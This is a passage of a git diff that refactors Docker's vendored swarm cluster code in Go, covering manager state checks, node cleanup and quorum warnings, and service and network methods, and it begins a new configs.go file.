state.swarmNode.NodeID() + remotes := state.swarmNode.Remotes() + addressList := make([]string, 0, len(remotes)) + for _, r := range remotes { if r.NodeID != nodeID { - return r.Addr + addressList = append(addressList, r.Addr) } } - return "" + return addressList } // ListenClusterEvents returns a 
channel that receives messages on cluster // participation changes. // todo: make cancelable and accessible to multiple callers -func (c *Cluster) ListenClusterEvents() <-chan struct{} { +func (c *Cluster) ListenClusterEvents() <-chan lncluster.ConfigEventType { return c.configEvent } -// Info returns information about the current cluster state. -func (c *Cluster) Info() types.Info { - info := types.Info{ - NodeAddr: c.GetAdvertiseAddress(), - } - - c.RLock() - defer c.RUnlock() +// currentNodeState should not be called without a read lock +func (c *Cluster) currentNodeState() nodeState { + return c.nr.State() +} - if c.node == nil { - info.LocalNodeState = types.LocalNodeStateInactive - if c.cancelDelay != nil { - info.LocalNodeState = types.LocalNodeStateError - } - if c.locked { - info.LocalNodeState = types.LocalNodeStateLocked - } else if c.err == ErrSwarmCertificatesExpired { - info.LocalNodeState = types.LocalNodeStateError +// errNoManager returns error describing why manager commands can't be used. +// Call with read lock. +func (c *Cluster) errNoManager(st nodeState) error { + if st.swarmNode == nil { + if errors.Cause(st.err) == errSwarmLocked { + return errSwarmLocked } - } else { - info.LocalNodeState = types.LocalNodeStatePending - if c.ready == true { - info.LocalNodeState = types.LocalNodeStateActive - } else if c.locked { - info.LocalNodeState = types.LocalNodeStateLocked + if st.err == errSwarmCertificatesExpired { + return errSwarmCertificatesExpired } + return errors.WithStack(notAvailableError("This node is not a swarm manager. Use \"docker swarm init\" or \"docker swarm join\" to connect this node to swarm and try again.")) } - if c.err != nil { - info.Error = c.err.Error() + if st.swarmNode.Manager() != nil { + return errors.WithStack(notAvailableError("This node is not a swarm manager. Manager is being prepared or has trouble connecting to the cluster.")) } + return errors.WithStack(notAvailableError("This node is not a swarm manager. 
Worker nodes can't be used to view or modify cluster state. Please run this command on a manager node or promote the current node to a manager.")) +} - ctx, cancel := c.getRequestContext() - defer cancel() - - if c.isActiveManager() { - info.ControlAvailable = true - swarm, err := c.Inspect() - if err != nil { - info.Error = err.Error() - } +// Cleanup stops active swarm node. This is run before daemon shutdown. +func (c *Cluster) Cleanup() { + c.controlMutex.Lock() + defer c.controlMutex.Unlock() - // Strip JoinTokens - info.Cluster = swarm.ClusterInfo + c.mu.Lock() + node := c.nr + if node == nil { + c.mu.Unlock() + return + } + state := c.currentNodeState() + c.mu.Unlock() - if r, err := c.client.ListNodes(ctx, &swarmapi.ListNodesRequest{}); err == nil { - info.Nodes = len(r.Nodes) - for _, n := range r.Nodes { - if n.ManagerStatus != nil { - info.Managers = info.Managers + 1 - } + if state.IsActiveManager() { + active, reachable, unreachable, err := managerStats(state.controlClient, state.NodeID()) + if err == nil { + singlenode := active && isLastManager(reachable, unreachable) + if active && !singlenode && removingManagerCausesLossOfQuorum(reachable, unreachable) { + logrus.Errorf("Leaving cluster with %v managers left out of %v. 
Raft quorum will be lost.", reachable-1, reachable+unreachable) } } } - if c.node != nil { - for _, r := range c.node.Remotes() { - info.RemoteManagers = append(info.RemoteManagers, types.Peer{NodeID: r.NodeID, Addr: r.Addr}) - } - info.NodeID = c.node.NodeID() + if err := node.Stop(); err != nil { + logrus.Errorf("failed to shut down cluster node: %v", err) + signal.DumpStacks("") } - return info + c.mu.Lock() + c.nr = nil + c.mu.Unlock() } -// isActiveManager should not be called without a read lock -func (c *Cluster) isActiveManager() bool { - return c.node != nil && c.conn != nil -} - -// swarmExists should not be called without a read lock -func (c *Cluster) swarmExists() bool { - return c.node != nil || c.locked || c.err == ErrSwarmCertificatesExpired -} - -// errNoManager returns error describing why manager commands can't be used. -// Call with read lock. -func (c *Cluster) errNoManager() error { - if c.node == nil { - if c.locked { - return ErrSwarmLocked - } - if c.err == ErrSwarmCertificatesExpired { - return ErrSwarmCertificatesExpired - } - return fmt.Errorf("This node is not a swarm manager. Use \"docker swarm init\" or \"docker swarm join\" to connect this node to swarm and try again.") - } - if c.node.Manager() != nil { - return fmt.Errorf("This node is not a swarm manager. Manager is being prepared or has trouble connecting to the cluster.") - } - return fmt.Errorf("This node is not a swarm manager. Worker nodes can't be used to view or modify cluster state. Please run this command on a manager node or promote the current node to a manager.") -} - -// GetServices returns all services of a managed swarm cluster. 
-func (c *Cluster) GetServices(options apitypes.ServiceListOptions) ([]types.Service, error) { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return nil, c.errNoManager() - } - - filters, err := newListServicesFilters(options.Filters) - if err != nil { - return nil, err - } - ctx, cancel := c.getRequestContext() - defer cancel() - - r, err := c.client.ListServices( - ctx, - &swarmapi.ListServicesRequest{Filters: filters}) - if err != nil { - return nil, err - } - - services := []types.Service{} - - for _, service := range r.Services { - services = append(services, convert.ServiceFromGRPC(*service)) - } - - return services, nil -} - -// imageWithDigestString takes an image such as name or name:tag -// and returns the image pinned to a digest, such as name@sha256:34234... -// Due to the difference between the docker/docker/reference, and the -// docker/distribution/reference packages, we're parsing the image twice. -// As the two packages converge, this function should be simplified. -// TODO(nishanttotla): After the packages converge, the function must -// convert distreference.Named -> distreference.Canonical, and the logic simplified. -func (c *Cluster) imageWithDigestString(ctx context.Context, image string, authConfig *apitypes.AuthConfig) (string, error) { - if _, err := digest.ParseDigest(image); err == nil { - return "", errors.New("image reference is an image ID") - } - ref, err := distreference.ParseNamed(image) - if err != nil { - return "", err - } - // only query registry if not a canonical reference (i.e. 
with digest) - if _, ok := ref.(distreference.Canonical); !ok { - // create a docker/docker/reference Named object because GetRepository needs it - dockerRef, err := reference.ParseNamed(image) - if err != nil { - return "", err - } - dockerRef = reference.WithDefaultTag(dockerRef) - namedTaggedRef, ok := dockerRef.(reference.NamedTagged) - if !ok { - return "", fmt.Errorf("unable to cast image to NamedTagged reference object") - } - - repo, _, err := c.config.Backend.GetRepository(ctx, namedTaggedRef, authConfig) - if err != nil { - return "", err - } - dscrptr, err := repo.Tags(ctx).Get(ctx, namedTaggedRef.Tag()) - if err != nil { - return "", err - } - - namedDigestedRef, err := distreference.WithDigest(distreference.EnsureTagged(ref), dscrptr.Digest) - if err != nil { - return "", err - } - return namedDigestedRef.String(), nil - } - // reference already contains a digest, so just return it - return ref.String(), nil -} - -// CreateService creates a new service in a managed swarm cluster. 
-func (c *Cluster) CreateService(s types.ServiceSpec, encodedAuth string) (*apitypes.ServiceCreateResponse, error) { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return nil, c.errNoManager() - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - err := c.populateNetworkID(ctx, c.client, &s) - if err != nil { - return nil, err - } - - serviceSpec, err := convert.ServiceSpecToGRPC(s) - if err != nil { - return nil, err - } - - ctnr := serviceSpec.Task.GetContainer() - if ctnr == nil { - return nil, fmt.Errorf("service does not use container tasks") - } - - if encodedAuth != "" { - ctnr.PullOptions = &swarmapi.ContainerSpec_PullOptions{RegistryAuth: encodedAuth} - } - - // retrieve auth config from encoded auth - authConfig := &apitypes.AuthConfig{} - if encodedAuth != "" { - if err := json.NewDecoder(base64.NewDecoder(base64.URLEncoding, strings.NewReader(encodedAuth))).Decode(authConfig); err != nil { - logrus.Warnf("invalid authconfig: %v", err) - } - } - - resp := &apitypes.ServiceCreateResponse{} - - // pin image by digest - if os.Getenv("DOCKER_SERVICE_PREFER_OFFLINE_IMAGE") != "1" { - digestImage, err := c.imageWithDigestString(ctx, ctnr.Image, authConfig) - if err != nil { - logrus.Warnf("unable to pin image %s to digest: %s", ctnr.Image, err.Error()) - resp.Warnings = append(resp.Warnings, fmt.Sprintf("unable to pin image %s to digest: %s", ctnr.Image, err.Error())) - } else if ctnr.Image != digestImage { - logrus.Debugf("pinning image %s by digest: %s", ctnr.Image, digestImage) - ctnr.Image = digestImage - } else { - logrus.Debugf("creating service using supplied digest reference %s", ctnr.Image) - } - } - - r, err := c.client.CreateService(ctx, &swarmapi.CreateServiceRequest{Spec: &serviceSpec}) - if err != nil { - return nil, err - } - - resp.ID = r.Service.ID - return resp, nil -} - -// GetService returns a service based on an ID or name. 
-func (c *Cluster) GetService(input string) (types.Service, error) { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return types.Service{}, c.errNoManager() - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - service, err := getService(ctx, c.client, input) - if err != nil { - return types.Service{}, err - } - return convert.ServiceFromGRPC(*service), nil -} - -// UpdateService updates existing service to match new properties. -func (c *Cluster) UpdateService(serviceIDOrName string, version uint64, spec types.ServiceSpec, encodedAuth string, registryAuthFrom string) (*apitypes.ServiceUpdateResponse, error) { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return nil, c.errNoManager() - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - err := c.populateNetworkID(ctx, c.client, &spec) - if err != nil { - return nil, err - } - - serviceSpec, err := convert.ServiceSpecToGRPC(spec) - if err != nil { - return nil, err - } - - currentService, err := getService(ctx, c.client, serviceIDOrName) - if err != nil { - return nil, err - } - - newCtnr := serviceSpec.Task.GetContainer() - if newCtnr == nil { - return nil, fmt.Errorf("service does not use container tasks") - } - - if encodedAuth != "" { - newCtnr.PullOptions = &swarmapi.ContainerSpec_PullOptions{RegistryAuth: encodedAuth} - } else { - // this is needed because if the encodedAuth isn't being updated then we - // shouldn't lose it, and continue to use the one that was already present - var ctnr *swarmapi.ContainerSpec - switch registryAuthFrom { - case apitypes.RegistryAuthFromSpec, "": - ctnr = currentService.Spec.Task.GetContainer() - case apitypes.RegistryAuthFromPreviousSpec: - if currentService.PreviousSpec == nil { - return nil, fmt.Errorf("service does not have a previous spec") - } - ctnr = currentService.PreviousSpec.Task.GetContainer() - default: - return nil, fmt.Errorf("unsupported registryAuthFromValue") - } - if ctnr == nil { - return nil, 
fmt.Errorf("service does not use container tasks") - } - newCtnr.PullOptions = ctnr.PullOptions - // update encodedAuth so it can be used to pin image by digest - if ctnr.PullOptions != nil { - encodedAuth = ctnr.PullOptions.RegistryAuth - } - } - - // retrieve auth config from encoded auth - authConfig := &apitypes.AuthConfig{} - if encodedAuth != "" { - if err := json.NewDecoder(base64.NewDecoder(base64.URLEncoding, strings.NewReader(encodedAuth))).Decode(authConfig); err != nil { - logrus.Warnf("invalid authconfig: %v", err) - } - } - - resp := &apitypes.ServiceUpdateResponse{} - - // pin image by digest - if os.Getenv("DOCKER_SERVICE_PREFER_OFFLINE_IMAGE") != "1" { - digestImage, err := c.imageWithDigestString(ctx, newCtnr.Image, authConfig) - if err != nil { - logrus.Warnf("unable to pin image %s to digest: %s", newCtnr.Image, err.Error()) - resp.Warnings = append(resp.Warnings, fmt.Sprintf("unable to pin image %s to digest: %s", newCtnr.Image, err.Error())) - } else if newCtnr.Image != digestImage { - logrus.Debugf("pinning image %s by digest: %s", newCtnr.Image, digestImage) - newCtnr.Image = digestImage - } else { - logrus.Debugf("updating service using supplied digest reference %s", newCtnr.Image) - } - } - - _, err = c.client.UpdateService( - ctx, - &swarmapi.UpdateServiceRequest{ - ServiceID: currentService.ID, - Spec: &serviceSpec, - ServiceVersion: &swarmapi.Version{ - Index: version, - }, - }, - ) - - return resp, err -} - -// RemoveService removes a service from a managed swarm cluster. 
-func (c *Cluster) RemoveService(input string) error { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return c.errNoManager() - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - service, err := getService(ctx, c.client, input) - if err != nil { - return err - } - - if _, err := c.client.RemoveService(ctx, &swarmapi.RemoveServiceRequest{ServiceID: service.ID}); err != nil { - return err - } - return nil -} - -// ServiceLogs collects service logs and writes them back to `config.OutStream` -func (c *Cluster) ServiceLogs(ctx context.Context, input string, config *backend.ContainerLogsConfig, started chan struct{}) error { - c.RLock() - if !c.isActiveManager() { - c.RUnlock() - return c.errNoManager() - } - - service, err := getService(ctx, c.client, input) - if err != nil { - c.RUnlock() - return err - } - - stream, err := c.logs.SubscribeLogs(ctx, &swarmapi.SubscribeLogsRequest{ - Selector: &swarmapi.LogSelector{ - ServiceIDs: []string{service.ID}, - }, - Options: &swarmapi.LogSubscriptionOptions{ - Follow: config.Follow, - }, - }) - if err != nil { - c.RUnlock() - return err - } - - wf := ioutils.NewWriteFlusher(config.OutStream) - defer wf.Close() - close(started) - wf.Flush() - - outStream := stdcopy.NewStdWriter(wf, stdcopy.Stdout) - errStream := stdcopy.NewStdWriter(wf, stdcopy.Stderr) - - // Release the lock before starting the stream. - c.RUnlock() - for { - // Check the context before doing anything. - select { - case <-ctx.Done(): - return ctx.Err() - default: - } - - subscribeMsg, err := stream.Recv() - if err == io.EOF { - return nil - } - if err != nil { - return err - } - - for _, msg := range subscribeMsg.Messages { - data := []byte{} - - if config.Timestamps { - ts, err := ptypes.Timestamp(msg.Timestamp) - if err != nil { - return err - } - data = append(data, []byte(ts.Format(logger.TimeFormat)+" ")...) 
- } - - data = append(data, []byte(fmt.Sprintf("%s.node.id=%s,%s.service.id=%s,%s.task.id=%s ", - contextPrefix, msg.Context.NodeID, - contextPrefix, msg.Context.ServiceID, - contextPrefix, msg.Context.TaskID, - ))...) - - data = append(data, msg.Data...) - - switch msg.Stream { - case swarmapi.LogStreamStdout: - outStream.Write(data) - case swarmapi.LogStreamStderr: - errStream.Write(data) - } - } - } -} - -// GetNodes returns a list of all nodes known to a cluster. -func (c *Cluster) GetNodes(options apitypes.NodeListOptions) ([]types.Node, error) { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return nil, c.errNoManager() - } - - filters, err := newListNodesFilters(options.Filters) - if err != nil { - return nil, err - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - r, err := c.client.ListNodes( - ctx, - &swarmapi.ListNodesRequest{Filters: filters}) - if err != nil { - return nil, err - } - - nodes := []types.Node{} - - for _, node := range r.Nodes { - nodes = append(nodes, convert.NodeFromGRPC(*node)) - } - return nodes, nil -} - -// GetNode returns a node based on an ID or name. -func (c *Cluster) GetNode(input string) (types.Node, error) { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return types.Node{}, c.errNoManager() - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - node, err := getNode(ctx, c.client, input) - if err != nil { - return types.Node{}, err - } - return convert.NodeFromGRPC(*node), nil -} - -// UpdateNode updates existing nodes properties. 
-func (c *Cluster) UpdateNode(input string, version uint64, spec types.NodeSpec) error { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return c.errNoManager() - } - - nodeSpec, err := convert.NodeSpecToGRPC(spec) - if err != nil { - return err - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - currentNode, err := getNode(ctx, c.client, input) - if err != nil { - return err - } - - _, err = c.client.UpdateNode( - ctx, - &swarmapi.UpdateNodeRequest{ - NodeID: currentNode.ID, - Spec: &nodeSpec, - NodeVersion: &swarmapi.Version{ - Index: version, - }, - }, - ) - return err -} - -// RemoveNode removes a node from a cluster -func (c *Cluster) RemoveNode(input string, force bool) error { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return c.errNoManager() - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - node, err := getNode(ctx, c.client, input) - if err != nil { - return err - } - - if _, err := c.client.RemoveNode(ctx, &swarmapi.RemoveNodeRequest{NodeID: node.ID, Force: force}); err != nil { - return err - } - return nil -} - -// GetTasks returns a list of tasks matching the filter options. 
-func (c *Cluster) GetTasks(options apitypes.TaskListOptions) ([]types.Task, error) { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return nil, c.errNoManager() - } - - byName := func(filter filters.Args) error { - if filter.Include("service") { - serviceFilters := filter.Get("service") - for _, serviceFilter := range serviceFilters { - service, err := c.GetService(serviceFilter) - if err != nil { - return err - } - filter.Del("service", serviceFilter) - filter.Add("service", service.ID) - } - } - if filter.Include("node") { - nodeFilters := filter.Get("node") - for _, nodeFilter := range nodeFilters { - node, err := c.GetNode(nodeFilter) - if err != nil { - return err - } - filter.Del("node", nodeFilter) - filter.Add("node", node.ID) - } - } - return nil - } - - filters, err := newListTasksFilters(options.Filters, byName) - if err != nil { - return nil, err - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - r, err := c.client.ListTasks( - ctx, - &swarmapi.ListTasksRequest{Filters: filters}) - if err != nil { - return nil, err - } - - tasks := []types.Task{} - - for _, task := range r.Tasks { - if task.Spec.GetContainer() != nil { - tasks = append(tasks, convert.TaskFromGRPC(*task)) - } - } - return tasks, nil -} - -// GetTask returns a task by an ID. -func (c *Cluster) GetTask(input string) (types.Task, error) { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return types.Task{}, c.errNoManager() - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - task, err := getTask(ctx, c.client, input) - if err != nil { - return types.Task{}, err - } - return convert.TaskFromGRPC(*task), nil -} - -// GetNetwork returns a cluster network by an ID. 
-func (c *Cluster) GetNetwork(input string) (apitypes.NetworkResource, error) { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return apitypes.NetworkResource{}, c.errNoManager() - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - network, err := getNetwork(ctx, c.client, input) - if err != nil { - return apitypes.NetworkResource{}, err - } - return convert.BasicNetworkFromGRPC(*network), nil -} - -func (c *Cluster) getNetworks(filters *swarmapi.ListNetworksRequest_Filters) ([]apitypes.NetworkResource, error) { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return nil, c.errNoManager() - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - r, err := c.client.ListNetworks(ctx, &swarmapi.ListNetworksRequest{Filters: filters}) - if err != nil { - return nil, err - } - - var networks []apitypes.NetworkResource - - for _, network := range r.Networks { - networks = append(networks, convert.BasicNetworkFromGRPC(*network)) - } - - return networks, nil -} - -// GetNetworks returns all current cluster managed networks. -func (c *Cluster) GetNetworks() ([]apitypes.NetworkResource, error) { - return c.getNetworks(nil) -} - -// GetNetworksByName returns cluster managed networks by name. -// It is ok to have multiple networks here. #18864 -func (c *Cluster) GetNetworksByName(name string) ([]apitypes.NetworkResource, error) { - // Note that swarmapi.GetNetworkRequest.Name is not functional. - // So we cannot just use that with c.GetNetwork. - return c.getNetworks(&swarmapi.ListNetworksRequest_Filters{ - Names: []string{name}, - }) -} - -func attacherKey(target, containerID string) string { - return containerID + ":" + target -} - -// UpdateAttachment signals the attachment config to the attachment -// waiter who is trying to start or attach the container to the -// network. 
-func (c *Cluster) UpdateAttachment(target, containerID string, config *network.NetworkingConfig) error { - c.RLock() - attacher, ok := c.attachers[attacherKey(target, containerID)] - c.RUnlock() - if !ok || attacher == nil { - return fmt.Errorf("could not find attacher for container %s to network %s", containerID, target) - } - - attacher.attachWaitCh <- config - close(attacher.attachWaitCh) - return nil -} - -// WaitForDetachment waits for the container to stop or detach from -// the network. -func (c *Cluster) WaitForDetachment(ctx context.Context, networkName, networkID, taskID, containerID string) error { - c.RLock() - attacher, ok := c.attachers[attacherKey(networkName, containerID)] - if !ok { - attacher, ok = c.attachers[attacherKey(networkID, containerID)] - } - if c.node == nil || c.node.Agent() == nil { - c.RUnlock() - return fmt.Errorf("invalid cluster node while waiting for detachment") - } - - agent := c.node.Agent() - c.RUnlock() - - if ok && attacher != nil && - attacher.detachWaitCh != nil && - attacher.attachCompleteCh != nil { - // Attachment may be in progress still so wait for - // attachment to complete. - select { - case <-attacher.attachCompleteCh: - case <-ctx.Done(): - return ctx.Err() - } - - if attacher.taskID == taskID { - select { - case <-attacher.detachWaitCh: - case <-ctx.Done(): - return ctx.Err() - } - } - } - - return agent.ResourceAllocator().DetachNetwork(ctx, taskID) -} - -// AttachNetwork generates an attachment request towards the manager. 
-func (c *Cluster) AttachNetwork(target string, containerID string, addresses []string) (*network.NetworkingConfig, error) { - aKey := attacherKey(target, containerID) - c.Lock() - if c.node == nil || c.node.Agent() == nil { - c.Unlock() - return nil, fmt.Errorf("invalid cluster node while attaching to network") - } - if attacher, ok := c.attachers[aKey]; ok { - c.Unlock() - return attacher.config, nil - } - - agent := c.node.Agent() - attachWaitCh := make(chan *network.NetworkingConfig) - detachWaitCh := make(chan struct{}) - attachCompleteCh := make(chan struct{}) - c.attachers[aKey] = &attacher{ - attachWaitCh: attachWaitCh, - attachCompleteCh: attachCompleteCh, - detachWaitCh: detachWaitCh, - } - c.Unlock() - - ctx, cancel := c.getRequestContext() - defer cancel() - - taskID, err := agent.ResourceAllocator().AttachNetwork(ctx, containerID, target, addresses) - if err != nil { - c.Lock() - delete(c.attachers, aKey) - c.Unlock() - return nil, fmt.Errorf("Could not attach to network %s: %v", target, err) - } - - c.Lock() - c.attachers[aKey].taskID = taskID - close(attachCompleteCh) - c.Unlock() - - logrus.Debugf("Successfully attached to network %s with tid %s", target, taskID) - - var config *network.NetworkingConfig - select { - case config = <-attachWaitCh: - case <-ctx.Done(): - return nil, fmt.Errorf("attaching to network failed, make sure your network options are correct and check manager logs: %v", ctx.Err()) - } - - c.Lock() - c.attachers[aKey].config = config - c.Unlock() - return config, nil -} - -// DetachNetwork unblocks the waiters waiting on WaitForDetachment so -// that a request to detach can be generated towards the manager. 
-func (c *Cluster) DetachNetwork(target string, containerID string) error { - aKey := attacherKey(target, containerID) - - c.Lock() - attacher, ok := c.attachers[aKey] - delete(c.attachers, aKey) - c.Unlock() - - if !ok { - return fmt.Errorf("could not find network attachment for container %s to network %s", containerID, target) - } - - close(attacher.detachWaitCh) - return nil -} - -// CreateNetwork creates a new cluster managed network. -func (c *Cluster) CreateNetwork(s apitypes.NetworkCreateRequest) (string, error) { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return "", c.errNoManager() - } - - if runconfig.IsPreDefinedNetwork(s.Name) { - err := fmt.Errorf("%s is a pre-defined network and cannot be created", s.Name) - return "", apierrors.NewRequestForbiddenError(err) - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - networkSpec := convert.BasicNetworkCreateToGRPC(s) - r, err := c.client.CreateNetwork(ctx, &swarmapi.CreateNetworkRequest{Spec: &networkSpec}) - if err != nil { - return "", err - } - - return r.Network.ID, nil -} - -// RemoveNetwork removes a cluster network. 
-func (c *Cluster) RemoveNetwork(input string) error { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return c.errNoManager() - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - network, err := getNetwork(ctx, c.client, input) - if err != nil { - return err - } - - if _, err := c.client.RemoveNetwork(ctx, &swarmapi.RemoveNetworkRequest{NetworkID: network.ID}); err != nil { - return err - } - return nil -} - -func (c *Cluster) populateNetworkID(ctx context.Context, client swarmapi.ControlClient, s *types.ServiceSpec) error { - // Always prefer NetworkAttachmentConfigs from TaskTemplate - // but fallback to service spec for backward compatibility - networks := s.TaskTemplate.Networks - if len(networks) == 0 { - networks = s.Networks - } - - for i, n := range networks { - apiNetwork, err := getNetwork(ctx, client, n.Target) - if err != nil { - if ln, _ := c.config.Backend.FindNetwork(n.Target); ln != nil && !ln.Info().Dynamic() { - err = fmt.Errorf("The network %s cannot be used with services. Only networks scoped to the swarm can be used, such as those created with the overlay driver.", ln.Name()) - return apierrors.NewRequestForbiddenError(err) - } - return err - } - networks[i].Target = apiNetwork.ID - } - return nil -} - -func getNetwork(ctx context.Context, c swarmapi.ControlClient, input string) (*swarmapi.Network, error) { - // GetNetwork to match via full ID. - rg, err := c.GetNetwork(ctx, &swarmapi.GetNetworkRequest{NetworkID: input}) - if err != nil { - // If any error (including NotFound), ListNetworks to match via ID prefix and full name. 
- rl, err := c.ListNetworks(ctx, &swarmapi.ListNetworksRequest{Filters: &swarmapi.ListNetworksRequest_Filters{Names: []string{input}}}) - if err != nil || len(rl.Networks) == 0 { - rl, err = c.ListNetworks(ctx, &swarmapi.ListNetworksRequest{Filters: &swarmapi.ListNetworksRequest_Filters{IDPrefixes: []string{input}}}) - } - - if err != nil { - return nil, err - } - - if len(rl.Networks) == 0 { - return nil, fmt.Errorf("network %s not found", input) - } - - if l := len(rl.Networks); l > 1 { - return nil, fmt.Errorf("network %s is ambiguous (%d matches found)", input, l) - } - - return rl.Networks[0], nil - } - return rg.Network, nil -} - -// Cleanup stops active swarm node. This is run before daemon shutdown. -func (c *Cluster) Cleanup() { - c.Lock() - node := c.node - if node == nil { - c.Unlock() - return - } - defer c.Unlock() - if c.isActiveManager() { - active, reachable, unreachable, err := c.managerStats() - if err == nil { - singlenode := active && isLastManager(reachable, unreachable) - if active && !singlenode && removingManagerCausesLossOfQuorum(reachable, unreachable) { - logrus.Errorf("Leaving cluster with %v managers left out of %v. 
Raft quorum will be lost.", reachable-1, reachable+unreachable) - } - } - } - c.stopNode() -} - -func (c *Cluster) managerStats() (current bool, reachable int, unreachable int, err error) { +func managerStats(client swarmapi.ControlClient, currentNodeID string) (current bool, reachable int, unreachable int, err error) { ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second) defer cancel() - nodes, err := c.client.ListNodes(ctx, &swarmapi.ListNodesRequest{}) + nodes, err := client.ListNodes(ctx, &swarmapi.ListNodesRequest{}) if err != nil { return false, 0, 0, err } @@ -1860,7 +405,7 @@ func (c *Cluster) managerStats() (current bool, reachable int, unreachable int, if n.ManagerStatus != nil { if n.ManagerStatus.Reachability == swarmapi.RaftMemberStatus_REACHABLE { reachable++ - if n.ID == c.node.NodeID() { + if n.ID == currentNodeID { current = true } } @@ -1872,102 +417,34 @@ func (c *Cluster) managerStats() (current bool, reachable int, unreachable int, return } -func validateAndSanitizeInitRequest(req *types.InitRequest) error { - var err error - req.ListenAddr, err = validateAddr(req.ListenAddr) - if err != nil { - return fmt.Errorf("invalid ListenAddr %q: %v", req.ListenAddr, err) - } - - if req.Spec.Annotations.Name == "" { - req.Spec.Annotations.Name = "default" - } else if req.Spec.Annotations.Name != "default" { - return errors.New(`swarm spec must be named "default"`) +func detectLockedError(err error) error { + if err == swarmnode.ErrInvalidUnlockKey { + return errors.WithStack(errSwarmLocked) } - - return nil + return err } -func validateAndSanitizeJoinRequest(req *types.JoinRequest) error { - var err error - req.ListenAddr, err = validateAddr(req.ListenAddr) - if err != nil { - return fmt.Errorf("invalid ListenAddr %q: %v", req.ListenAddr, err) - } - if len(req.RemoteAddrs) == 0 { - return fmt.Errorf("at least 1 RemoteAddr is required to join") - } - for i := range req.RemoteAddrs { - req.RemoteAddrs[i], err = 
validateAddr(req.RemoteAddrs[i]) - if err != nil { - return fmt.Errorf("invalid remoteAddr %q: %v", req.RemoteAddrs[i], err) - } - } - return nil -} +func (c *Cluster) lockedManagerAction(fn func(ctx context.Context, state nodeState) error) error { + c.mu.RLock() + defer c.mu.RUnlock() -func validateAddr(addr string) (string, error) { - if addr == "" { - return addr, fmt.Errorf("invalid empty address") - } - newaddr, err := opts.ParseTCPAddr(addr, defaultAddr) - if err != nil { - return addr, nil + state := c.currentNodeState() + if !state.IsActiveManager() { + return c.errNoManager(state) } - return strings.TrimPrefix(newaddr, "tcp://"), nil -} -func initClusterSpec(node *node, spec types.Spec) error { - ctx, _ := context.WithTimeout(context.Background(), 5*time.Second) - for conn := range node.ListenControlSocket(ctx) { - if ctx.Err() != nil { - return ctx.Err() - } - if conn != nil { - client := swarmapi.NewControlClient(conn) - var cluster *swarmapi.Cluster - for i := 0; ; i++ { - lcr, err := client.ListClusters(ctx, &swarmapi.ListClustersRequest{}) - if err != nil { - return fmt.Errorf("error on listing clusters: %v", err) - } - if len(lcr.Clusters) == 0 { - if i < 10 { - time.Sleep(200 * time.Millisecond) - continue - } - return fmt.Errorf("empty list of clusters was returned") - } - cluster = lcr.Clusters[0] - break - } - // In init, we take the initial default values from swarmkit, and merge - // any non nil or 0 value from spec to GRPC spec. This will leave the - // default value alone. 
- // Note that this is different from Update(), as in Update() we expect - // user to specify the complete spec of the cluster (as they already know - // the existing one and knows which field to update) - clusterSpec, err := convert.MergeSwarmSpecToGRPC(spec, cluster.Spec) - if err != nil { - return fmt.Errorf("error updating cluster settings: %v", err) - } - _, err = client.UpdateCluster(ctx, &swarmapi.UpdateClusterRequest{ - ClusterID: cluster.ID, - ClusterVersion: &cluster.Meta.Version, - Spec: &clusterSpec, - }) - if err != nil { - return fmt.Errorf("error updating cluster settings: %v", err) - } - return nil - } - } - return ctx.Err() + ctx, cancel := c.getRequestContext() + defer cancel() + + return fn(ctx, state) } -func detectLockedError(err error) error { - if err == swarmnode.ErrInvalidUnlockKey { - return errors.WithStack(ErrSwarmLocked) - } - return err +// SendClusterEvent allows to send cluster events on the configEvent channel +// TODO This method should not be exposed. +// Currently it is used to notify the network controller that the keys are +// available +func (c *Cluster) SendClusterEvent(event lncluster.ConfigEventType) { + c.mu.RLock() + defer c.mu.RUnlock() + c.configEvent <- event } diff --git a/vendor/github.com/docker/docker/daemon/cluster/configs.go b/vendor/github.com/docker/docker/daemon/cluster/configs.go new file mode 100644 index 0000000000..6b373e618b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/configs.go @@ -0,0 +1,118 @@ +package cluster // import "github.com/docker/docker/daemon/cluster" + +import ( + "context" + + apitypes "github.com/docker/docker/api/types" + types "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/daemon/cluster/convert" + swarmapi "github.com/docker/swarmkit/api" +) + +// GetConfig returns a config from a managed swarm cluster +func (c *Cluster) GetConfig(input string) (types.Config, error) { + var config *swarmapi.Config + + if err := 
